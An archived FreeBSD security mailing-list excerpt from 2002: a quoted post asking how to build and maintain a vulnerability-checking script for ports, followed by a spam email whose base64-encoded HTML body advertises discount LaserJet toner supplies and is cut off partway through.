>Writing the script itself should be no problem for me but maintaining the >vulnerability database could become difficult as the number of ports grow. >A script that crawls through the ports cvs tree and checking for ports >marked forbidden since the last run would be a good start but for >unmaintained ports bugtraq/vuln-watch/... has to be read. >Any ideas how to get more input? > >Which language to use? >Perl would do fine for this job but as Perl isn't in the base system >anymore a shell script or c program would be better if it should be >possible to run this as part of the daily cron job. >If I start with this what language should I use? > >Thanks for all comments, Hendrik > >P.S. I won't be able to answer all questions immediatly as I'm on vacation :) > >-- >Hendrik Scholz - - http://raisdorf.net/ > >drag me, drop me - treat me like an object > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 29 20:54:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5569637B412; Mon, 29 Jul 2002 20:52:03 -0700 (PDT) Received: from yahoo.com (c162.h061013062.is.net.tw [61.13.62.162]) by mx1.FreeBSD.org (Postfix) with SMTP id 9886A43E3B; Mon, 29 Jul 2002 20:51:48 -0700 (PDT) (envelope-from adc@usa.net) Received: from m10.grp.snv.yahoo.com ([137.126.140.48]) by f64.law4.hotmail.com with QMQP; Sun, 28 Jul 2002 12:24:21 -0400 Reply-To: Message-ID: From: To: , , , , , , , , , Subject: hi there Date: Mon, 29 Jul 2002 23:26:45 -0400 MiME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_00Q6_57T79V9X.Y3111B11" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: QUALCOMM Windows Eudora Version 5.1 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ------=_NextPart_000_00Q6_57T79V9X.Y3111B11 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: base64 PCFkb2N0eXBlIGh0bWwgcHVibGljICItLy93M2MvL2R0ZCBodG1sIDQuMCB0cmFuc2l0aW9uYWwv L2VuIj4NCjxodG1sPg0KPGhlYWQ+DQogICA8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUi IGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIj4NCiAgIDxtZXRhIG5hbWU9 IkF1dGhvciIgY29udGVudD0ic2FtIj4NCiAgIDxtZXRhIG5hbWU9IkdFTkVSQVRPUiIgY29udGVu dD0iTW96aWxsYS80LjYxIFtlbl0gKFdpbjk4OyBJKSBbTmV0c2NhcGVdIj4NCiAgIDx0aXRsZT5m Z2ZnPC90aXRsZT4NCjwvaGVhZD4NCjxib2R5Pg0KJm5ic3A7DQo8dGFibGUgQk9SREVSIENPTFM9 MSBXSURUSD0iMTAwJSIgSEVJR0hUPSIxNSUiIEJHQ09MT1I9IiM0MDgwODAiID4NCjx0cj4NCjx0 ZCBCR0NPTE9SPSIjNDA4MDgwIj4NCjxjZW50ZXI+PGI+PGZvbnQgY29sb3I9IiNGRkZGRkYiPjxm b250IHNpemU9KzM+VkVSVEVYIExBU0VSIEFORCZuYnNwOzwvZm9udD48L2ZvbnQ+PC9iPg0KPGJy PjxiPjxmb250IGNvbG9yPSIjRkZGRkZGIj48Zm9udCBzaXplPSszPkNPUElFUiBTVVBQTElFUzwv Zm9udD48L2ZvbnQ+PC9iPjwvY2VudGVyPg0KPC90ZD4NCjwvdHI+DQo8L3RhYmxlPg0KDQo8YnI+ Jm5ic3A7DQo8Y2VudGVyPg0KPHA+PGZvbnQgY29sb3I9IiMwMDAwMDAiPjxmb250IHNpemU9KzI+ VEFLRSBBRFZBTlRBR0UgT0YgVEhFIFNBVklOR1MgV0hJTEUNClRIRVkgTEFTVCEhITwvZm9udD48 L2ZvbnQ+DQo8YnI+PGZvbnQgY29sb3I9IiMwMDAwMDAiPjxmb250IHNpemU9KzI+V0UgQVJFIFJF RFVDSU5HIE9VUiBJTlZFTlRPUlkgRk9SPC9mb250PjwvZm9udD4NCjxicj48Zm9udCBjb2xvcj0i IzAwMDAwMCI+PGZvbnQgc2l6ZT0rMj5USEUgU1VNTUVSIE9GIDIwMDIgT04gT1VSIExBU0VSPC9m b250PjwvZm9udD4NCjxicj48Zm9udCBjb2xvcj0iIzAwMDAwMCI+PGZvbnQgc2l6ZT0rMj5QUklO VEVSIEFORCBDT1BJRVIgU1VQUExJRVM8L2ZvbnQ+PC9mb250Pg0KPGJyPiZuYnNwOw0KPHA+PGZv bnQgY29sb3I9IiMwMDAwMDAiPjxmb250IHNpemU9KzI+Jm5ic3A7T1JERVIgQlkgUEhPTkU6IDEt ODg4LTI4OC05MDQzPC9mb250PjwvZm9udD4NCjxicj48Zm9udCBjb2xvcj0iIzAwMDAwMCI+PGZv bnQgc2l6ZT0rMj5PUkRFUiBCWSBGQVg6IDEtODg4LTk3Ny0xNTc3PC9mb250PjwvZm9udD4NCjxw PjxiPjxmb250IGNvbG9yPSIjMDAwMEEwIj48Zm9udCBzaXplPSsyPioqKkVNQUlMIFJFTU9WQUwg TElORTogMS04ODgtMjQ4LTQ5MzAqKio8L2ZvbnQ+PC9mb250PjwvYj4NCjxwPiZuYnNwO09SREVS IEJZIFBBR0UgTlVNQkVSIEFORC9PUiBJVEVNIE5VTUJFUg0KPGJyPiZuYnNwOw0KPGJyPiZuYnNw Ow0KPHA+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7PGZvbnQgZmFjZT0iQ29taWMgU2FucyBNUyI+ Jm5ic3A7IDwvZm9udD48dT48Zm9udCBmYWNlPSJBcmlhbCxIZWx2ZXRpY2EiPjxmb250IA0KY29s b3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzI+Rm9yDQpIZXdsZXR0IFBhY2thcmQgUHJpbnRlcnM6 PGk+IDwvaT4oUGFnZSAyKTwvZm9udD48L2ZvbnQ+PC9mb250PjwvdT48L2NlbnRlcj4NCg0KPHA+ PGJyPg0KPGNlbnRlcj48dGFibGUgQk9SREVSIFdJRFRIPSI4MCUiIEhFSUdIVD0iMTAlIiBCR0NP TE9SPSIjRkZGRkNDIiA+DQo8dHIgQkdDT0xPUj0iIzQwODA4MCI+DQo8dGQgQkdDT0xPUj0iIzQw ODA4MCI+DQo8Y2VudGVyPjxiPjxmb250IGNvbG9yPSIjRkZGRkZGIj48Zm9udCBzaXplPSsxPklU RU08L2ZvbnQ+PC9mb250PjwvYj48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZCBCR0NPTE9SPSIjNDA4 MDgwIj4NCjxjZW50ZXI+PGZvbnQgc2l6ZT0rMT4mbmJzcDs8Yj48Zm9udCBjb2xvcj0iI0ZGRkZG RiI+REVTQ1JJUFRJT048L2ZvbnQ+PC9iPjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4N CjxjZW50ZXI+PGI+PGZvbnQgY29sb3I9IiNGRkZGRkYiPjxmb250IHNpemU9KzE+TUZHICM8L2Zv bnQ+PC9mb250PjwvYj48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGI+PGZvbnQg Y29sb3I9IiNGRkZGRkYiPjxmb250IHNpemU9KzE+UFJJQ0U8L2ZvbnQ+PC9mb250PjwvYj48L2Nl bnRlcj4NCjwvdGQ+DQo8L3RyPg0KDQo8dHI+DQo8dGQgQkdDT0xPUj0iI0ZGRkZDQyI+DQo8Y2Vu dGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkl0ZW0gIzE8L2ZvbnQ+PC9m b250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5 OSI+PGZvbnQgc2l6ZT0rMT5MYXNlcmpldCBTZXJpZXMgNEwsIDRQJm5ic3A7PC9mb250PjwvZm9u dD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTki Pjxmb250IHNpemU9KzE+Jm5ic3A7OTIyNzRBPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+ DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+JDQ0 PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQo8L3RyPg0KDQo8dHI+DQo8dGQgQkdDT0xP Uj0iI0ZGRkZDQyI+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsx Pkl0ZW0gIzI8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48 Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5MYXNlcmpldCBTZXJpZXMgMTEwMCwz MjAwPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQg Y29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+Jm5ic3A7QzQwOTI8L2ZvbnQ+PC9mb250Pjwv Y2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZv bnQgc2l6ZT0rMT4mbmJzcDskNDQ8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCjwvdHI+ DQoNCjx0cj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9 KzE+SXRlbSAjMzwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVy Pjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiZuYnNwO0xhc2VyamV0IFNlcmll cyZuYnNwOw0KMjwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVy Pjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiZuYnNwOyA5MjI5NUE8L2ZvbnQ+ PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAw MDA5OSI+PGZvbnQgc2l6ZT0rMT4mbmJzcDsgJDQ5PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwv dGQ+DQo8L3RyPg0KDQo8dHI+DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48 Zm9udCBzaXplPSsxPiZuYnNwO0l0ZW0gIyA0PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+ DQoNCjx0ZCBXSURUSD0iNzAlIj4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250 IHNpemU9KzE+Jm5ic3A7TGFzZXJqZXQgU2VyaWVzJm5ic3A7DQoyUDwvZm9udD48L2ZvbnQ+PC9j ZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9u dCBzaXplPSsxPiZuYnNwOzkyMjc1QTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8 dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiZuYnNwOyAk NTQ8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCjwvdHI+DQoNCjx0cj4NCjx0ZD4NCjxj ZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+Jm5ic3A7SXRlbSAjNTwv Zm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9y PSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiZuYnNwO0xhc2VyamV0IFNlcmllcyA1UCw2UCwNCjVN UCwgNk1QPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZv bnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+Jm5ic3A7MzYwM0E8L2ZvbnQ+PC9mb250 PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+ PGZvbnQgc2l6ZT0rMT4mbmJzcDskNDQ8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCjwv dHI+DQoNCjx0cj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNp emU9KzE+SXRlbSAjNjwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2Vu dGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiZuYnNwO0xhc2VyamV0IFNl cmllcyA1U0ksODAwMDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2Vu dGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiZuYnNwOzM5MDlBPC9mb250 PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMw MDAwOTkiPjxmb250IHNpemU9KzE+JDk1PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQo8 L3RyPg0KDQo8dHI+DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBz aXplPSsxPiZuYnNwO0l0ZW0gIzcmbmJzcDs8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4N Cg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4mbmJz cDtMYXNlcmpldCBTZXJpZXMgMjEwMCwNCjIyMDAmbmJzcDs8L2ZvbnQ+PC9mb250PjwvY2VudGVy Pg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6 ZT0rMT4mbmJzcDtDNDA5NjwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8 Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiZuYnNwOyQ3NDwvZm9u dD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48 Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4mbmJzcDtJdGVtICM4PC9mb250Pjwv Zm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAw OTkiPjxmb250IHNpemU9KzE+Jm5ic3A7TGFzZXJqZXQgU2VyaWVzIDgxMDA8L2ZvbnQ+PC9mb250 PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+ PGZvbnQgc2l6ZT0rMT4mbmJzcDtDNDE4MjwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0K DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiZuYnNw OyQxMTU8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCjwvdHI+DQoNCjx0cj4NCjx0ZD4N CjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+Jm5ic3A7SXRlbSAj OTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNv bG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkxhc2VyamV0IFNlcmllcyA1TC82TDwvZm9udD48 L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAw MDk5Ij48Zm9udCBzaXplPSsxPiZuYnNwOzM5MDZBPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwv dGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+ Jm5ic3A7JDM5PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQo8L3RyPg0KDQo8dHI+DQo8 dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiZuYnNwO0l0 ZW0gIzEwJm5ic3A7PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50 ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+TGFzZXJqZXQgU2VyaWVzJm5i c3A7IDRWPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZv bnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+QzM5MDAmbmJzcDs8L2ZvbnQ+PC9mb250 PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+ PGZvbnQgc2l6ZT0rMT4mbmJzcDskOTU8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCjwv dHI+DQoNCjx0cj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNp emU9KzE+Jm5ic3A7SXRlbSAjMTE8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRk Pg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5MYXNlcmpldCBT ZXJpZXMgNDAwMDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVy Pjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkM0MTI3WDwvZm9udD48L2ZvbnQ+ PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48 Zm9udCBzaXplPSsxPiZuYnNwOyQ3OTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KPC90 cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6 ZT0rMT4mbmJzcDtJdGVtICMxMjwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+ DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkxhc2VyamV0IFNl cmllcyAzU0kvNFNJPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50 ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+Jm5ic3A7OTIyOTFBJm5ic3A7 PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29s b3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+JDU0PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwv dGQ+DQo8L3RyPg0KDQo8dHI+DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48 Zm9udCBzaXplPSsxPiZuYnNwO0l0ZW0gIzEzPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+ DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+TGFz ZXJqZXQgU2VyaWVzIDQsNE0sNSw1TSZuYnNwOzwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3Rk Pg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPjky Mjk4QTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250 IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiQ0OTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+ DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5 OSI+PGZvbnQgc2l6ZT0rMT4mbmJzcDtJdGVtICMxM0E8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0K PC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0r MT5MYXNlcmpldCBTZXJpZXMgNTAwMDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8 dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkM0MTI5WDwv Zm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9y PSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiQxMjU8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90 ZD4NCjwvdHI+DQoNCjx0cj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxm b250IHNpemU9KzE+Jm5ic3A7SXRlbSAjMTNCPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+ DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+TGFz ZXJqZXQgU2VyaWVzIDEyMDAsIDMzMDANCnNlcmllczwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8 L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsx PkM3MTE1QTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxm b250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiQ1OTwvZm9udD48L2ZvbnQ+PC9jZW50 ZXI+DQo8L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAw MDA5OSI+PGZvbnQgc2l6ZT0rMT4mbmJzcDtJdGVtICMxM0M8L2ZvbnQ+PC9mb250PjwvY2VudGVy Pg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6 ZT0rMT5MYXNlcmpldCBTZXJpZXMgNDEwMDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0K DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkM4MDYx WDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNv bG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPiQ5OTwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8 L3RkPg0KPC90cj4NCg0KPHRyPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+ PGZvbnQgc2l6ZT0rMT4mbmJzcDtJdGVtICMxODwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3Rk Pg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkxh c2VyamV0IFNlcmllcyZuYnNwOyAzMTAwPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoN Cjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+MzkwNkE8 L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xv cj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT4kMzk8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90 ZD4NCjwvdHI+DQoNCjx0cj4NCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxm b250IHNpemU9KzE+Jm5ic3A7SXRlbSAjMTk8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4N Cg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5MYXNl cmpldCBTZXJpZXMgNDUwMCBCbGFjazwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8 dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXplPSsxPkM0MTkxJm5i c3A7PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQg Y29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+JDY5PC9mb250PjwvZm9udD48L2NlbnRlcj4N CjwvdGQ+DQo8L3RyPg0KDQo8dHI+DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5 Ij48Zm9udCBzaXplPSsxPiZuYnNwO0l0ZW0gIzIwPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwv dGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+ TGFzZXJqZXQgU2VyaWVzIDQ1MDAgQ29sb3I8L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4N Cg0KPHRkPg0KPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwMDA5OSI+PGZvbnQgc2l6ZT0rMT5DQUxM PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29s b3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzE+JDg5PC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwv dGQ+DQo8L3RyPg0KPC90YWJsZT48L2NlbnRlcj4NCg0KPGNlbnRlcj48cHJlPjx1Pjxmb250IGZh Y2U9IkFyaWFsLEhlbHZldGljYSI+PGZvbnQgY29sb3I9IiMwMDAwOTkiPjxmb250IHNpemU9KzM+ Rm9yIEhld2xldHQgUGFja2FuZCBDYW5ub24gRmF4IA0KPGk+KG9uIFBhZ2UgMjxiPik8L2I+PC9p PjwvZm9udD48L2ZvbnQ+PC9mb250PjwvdT48L3ByZT48L2NlbnRlcj4NCg0KPGNlbnRlcj48dGFi bGUgQk9SREVSIFdJRFRIPSI4MCUiIEhFSUdIVD0iMTAlIiBCR0NPTE9SPSIjRkZGRkNDIiA+DQo8 dHIgQUxJR049Q0VOVEVSIEJHQ09MT1I9IiM0MDgwODAiPg0KPHRkPg0KPGNlbnRlcj48Zm9udCBj b2xvcj0iI0ZGRkZGRiI+PGZvbnQgc2l6ZT0rMT5JVEVNPC9mb250PjwvZm9udD48L2NlbnRlcj4N CjwvdGQ+DQoNCjx0ZD4NCjxjZW50ZXI+PGZvbnQgY29sb3I9IiNGRkZGRkYiPjxmb250IHNpemU9 KzE+REVTQ1JJUFRJT048L2ZvbnQ+PC9mb250PjwvY2VudGVyPg0KPC90ZD4NCg0KPHRkPg0KPGNl bnRlcj48Zm9udCBjb2xvcj0iI0ZGRkZGRiI+PGZvbnQgc2l6ZT0rMT5NRkcgIzwvZm9udD48L2Zv bnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjRkZGRkZG Ij48Zm9udCBzaXplPSsxPlBSSUNFPC9mb250PjwvZm9udD48L2NlbnRlcj4NCjwvdGQ+DQo8L3Ry Pg0KDQo8dHI+DQo8dGQ+DQo8Y2VudGVyPjxmb250IGNvbG9yPSIjMDAwMDk5Ij48Zm9udCBzaXpl PSsxPkl0ZW0gIyAxNDwvZm9udD48L2ZvbnQ+PC9jZW50ZXI+DQo8L3RkPg0KDQo8dGQ+DQo8Y2Vu 